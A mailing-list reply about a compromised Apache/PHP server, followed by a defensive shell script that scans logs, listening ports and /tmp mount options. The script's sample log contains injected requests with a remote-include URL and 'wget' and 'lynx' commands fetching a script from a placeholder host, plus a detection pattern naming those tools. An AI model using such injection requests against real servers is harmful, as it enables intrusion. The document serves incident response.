Barbara M. wrote:
> A friend who has an httpd server based on TSL 2.2 has received this
> mail:
>
> Subject: Your_host_have_been_attacked
> Your host have been attacked by pv script. Look on netstat -anp for
> process listen on 4123 port
>
> It tells me that there is a process listening on port 4123 and another on
> 22222. Stopping httpd and killing the process that owns the daemons seems
> to temporarily "solve" the problem. He said that the processes are owned
> by httpd. He is now busy rebuilding a new box to migrate the data to, so
> he asked me to collect info on the "pv script".
> Any hints?

You may have a bad PHP script on your machine. Check your Apache logs for traces of injected programs. Specifically, grep the Apache logs for terms such as "wget", "lynx" etc., since there is a chance that the intruder uploaded a PHP script. Also check whether your PHP has any vulnerability.
Some points to secure your server:

1. Turn on the safe mode option in php.ini (caution: some website code needs to be rewritten if you do this).
2. Create /tmp as a separate partition and mount it with the noexec option. Make symbolic links from the other tmp directories (e.g. /var/tmp) to this partition.
3. Remove wget, lynx, make etc. from your server once it is in production, or at least chmod them so that only root can use them.
4. Set up iptables.

thank you
--
anu bhaskar
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
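As an added illustration of the checks suggested in the reply above (example code written for this page, not part of the original thread or of Trustix): a POSIX shell script that greps the request field of an Apache access log for wget/lynx/curl/fetch, lists LISTEN sockets outside an allow-list from `netstat -anp` output, and verifies that /tmp is a separate mount with noexec. The log lines, netstat output, mount table, IP addresses, PIDs, file names and program names are all constructed for the example and are assumptions, not data from the thread. On a real host replace the printf pipelines with the actual log file, `netstat -anp` and `cat /proc/mounts`.

```shell
#!/bin/sh
# Added example for the thread above (not code from the original posts).
# Three stdin-driven checks matching the advice in the reply:
#   1. find Apache requests whose query string invokes a download tool
#   2. list LISTEN sockets on unexpected ports from `netstat -anp` output
#   3. confirm /tmp is a separate mount with the noexec option
# Every sample below is constructed; IPs use RFC 5737 documentation ranges,
# and PIDs, program names and file names are made up.

# Constructed Apache combined-format log. Lines 2 and 3 carry a shell
# command in the query string; line 5 merely has a Wget User-Agent.
SAMPLE_LOG='203.0.113.5 - - [10/Mar/2005:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2005:12:00:09 +0000] "GET /index.php?page=http://198.51.100.7/inc.txt?&cmd=wget%20http://198.51.100.7/dl.sh HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2005:12:00:15 +0000] "GET /index.php?cmd=lynx+-source+http://198.51.100.7/dl.sh HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [10/Mar/2005:12:01:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2005:12:02:00 +0000] "GET /robots.txt HTTP/1.0" 200 44 "-" "Wget/1.9.1"'

# Constructed `netstat -anp` output (program names are assumptions).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1040/httpd
tcp        0      0 0.0.0.0:4123            0.0.0.0:*               LISTEN      2387/perl
tcp        0      0 0.0.0.0:22222           0.0.0.0:*               LISTEN      2390/perl
tcp        0      0 203.0.113.5:80          198.51.100.7:40231      ESTABLISHED 1041/httpd'

# Constructed /proc/mounts: /tmp is its own noexec filesystem, /var/tmp is not.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
proc /proc proc rw 0 0'

# Prints the request field (text between the first pair of double quotes)
# of every log line that invokes wget, lynx, curl or fetch. Only the request
# field is inspected so a legitimate "Wget/1.9" User-Agent does not match;
# %20 and + are decoded first so "cmd=wget%20http://..." is caught.
suspect_requests() {
    awk -F'"' '{ print $2 }' \
      | sed 's/%20/ /g; s/+/ /g' \
      | grep -iE '(^|[^a-z])(wget|lynx|curl|fetch)([^a-z]|$)'
}

# Same filter, but prints only the number of matching requests.
count_suspect_requests() {
    suspect_requests | grep -c . || true
}

# Reads `netstat -anp` output on stdin and prints "port PID/program" for
# every LISTEN socket whose local port is not in the space-separated
# allow-list $1. Anything printed deserves `ls -l /proc/PID/exe` and
# `ps -fp PID` before it is killed, so the binary and its parent (here the
# httpd worker) can be kept as evidence for the rebuild.
unexpected_listeners() {
    allow=" $1 "
    awk -v allow="$allow" '$6 == "LISTEN" {
        n = split($4, a, ":"); port = a[n]
        if (index(allow, " " port " ") == 0) print port, $7
    }'
}

# Reads /proc/mounts-format lines on stdin; succeeds only if mount point $1
# is a separate filesystem whose options include noexec. A directory that
# merely lives on / (like /var/tmp before it is symlinked) fails the check.
tmp_is_noexec() {
    awk -v mp="$1" '$2 == mp {
        n = split($4, o, ",")
        for (i = 1; i <= n; i++) if (o[i] == "noexec") found = 1
    } END { exit found ? 0 : 1 }'
}

echo "== requests invoking download tools =="
printf '%s\n' "$SAMPLE_LOG" | suspect_requests
echo "== listeners not on the allow-list (22 80) =="
printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_listeners "22 80"
for mp in /tmp /var/tmp; do
    if printf '%s\n' "$SAMPLE_MOUNTS" | tmp_is_noexec "$mp"; then
        echo "$mp: separate mount with noexec"
    else
        echo "$mp: NOT a separate noexec mount"
    fi
done
```

The netstat parser keys on the State column rather than on the port numbers from the warning mail, so it also surfaces a backdoor that has moved to a different port; widen the allow-list to whatever the box legitimately serves and treat every other LISTEN entry as something to explain before the data is migrated.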
